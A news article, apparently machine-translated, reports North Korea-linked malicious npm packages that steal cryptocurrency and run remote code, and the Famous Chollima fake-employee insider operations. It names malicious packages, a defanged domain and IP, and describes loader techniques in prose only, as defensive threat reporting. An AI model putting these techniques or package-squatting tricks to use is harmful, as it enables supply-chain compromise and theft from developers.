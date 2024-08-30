Cyber ​​criminals who are linked to North Korea have been observed publish a series of malicious packages to the npm registry, indicating “coordinated and relentless” efforts to target developers with malware and steal cryptocurrency assets.

NPM Registry: What is it in a nutshell?

The npm registry (NodePackageManager) is an online platform that hosts packages of JavaScript code.

It is used by developers to share, distribute and manage libraries and code modules that can be easily integrated into their projects.

The npm registry makes it easy to install, update, and manage software dependencies, allowing developers to use pre-existing code to save time and improve application development efficiency.

NPM log what is known about the attack

The latest wave, observed between August 12 and August 27, 2024, involved packages called temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console.

“The behavior in this campaign leads us to believe that qq-console is attributable to the North Korean campaign known as ‘Contagious Interview‘”, he has affirmed Software supply chain security firm Phylum, regarding the npm registry.

Contagious Interview refers to a Campaign in progress which aims to compromise software developers with information-stealing malware as part of a supposed job interview process, which involves trying to trick them into downloading fake npm packages or fake installers for video conferencing software like MiroTalk hosted on decoy websites.

The ultimate goal of the attacks is to distribute a Python payload called InvisibleFerret that can exfiltrate sensitive data from browser extensions for cryptocurrency wallets and Establish persistence on the system using legitimate remote desktop software like AnyDesk.

CrowdStrike is tracking this activity under the name Famous Chollima.

The new helmet-validate package observed takes a novel approach in that it incorporates a JavaScript code file called config.js that directly executes JavaScript hosted on a remote domain (“ipcheck[.]cloud”) using the function eval().

“Our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) which was solved by mirotalk[.]net when it was online“, Phylum said, highlighting potential links between the two sets of attacks.

The company also observed another package called sass-notification, uploaded on August 27, 2024, which shared similarities with previously discovered npm libraries such as call-blockflow And These packages have been attributed to another North Korean threat group called Moonstone Sleet.

“These attacks are characterized by the use of obfuscated JavaScript to write and execute batch and PowerShell scripts.“, the company said. “The scripts download and decrypt a remote payload, execute it as a DLL, and then They attempt to erase all traces of the malicious activity by leaving behind a seemingly benign package on the victim’s machine..”

Hacker Group Famous Chollima Spreads Agents Posing as IT Operators

The disclosure comes as CrowdStrike has linked Famous Chollima (formerly known as BadClone) to Insider Threat Operations That involve infiltrating corporate environments under the cover of legitimate employment.

“Famous Chollima conducted these operations by obtaining contracts or full-time employment, using falsified or stolen identification documents to bypass background checks.“, has affirmed the company. “When applying for a job, these malicious interns would submit a resume that typically listed previous employment at a major company, as well as other lesser-known companies with no work interruptions.”

While these attacks are primarily financially motivated, a subset of incidents are said to have involved the exfiltration of sensitive information; CrowdStrike said it identified cybercriminals applying for or actively working at more than 100 unique companies in the past year, most of which are located in the United States, Saudi Arabia, France, the Philippines, and Ukraine, among other countries.

The most targeted sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceuticals, social media and media companies.

“After gaining access to the victims’ employee-level networks, insiders performed minimal work related tasks.“, the company added. “In some cases, insiders also attempted to exfiltrate data using Git, SharePoint, and OneDrive.”

“Additionally, the insiders installed the following RMM tools: RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. The insiders then used these RMM tools in tandem with corporate network credentials, which allowed numerous IP addresses to connect to the victim’s system..”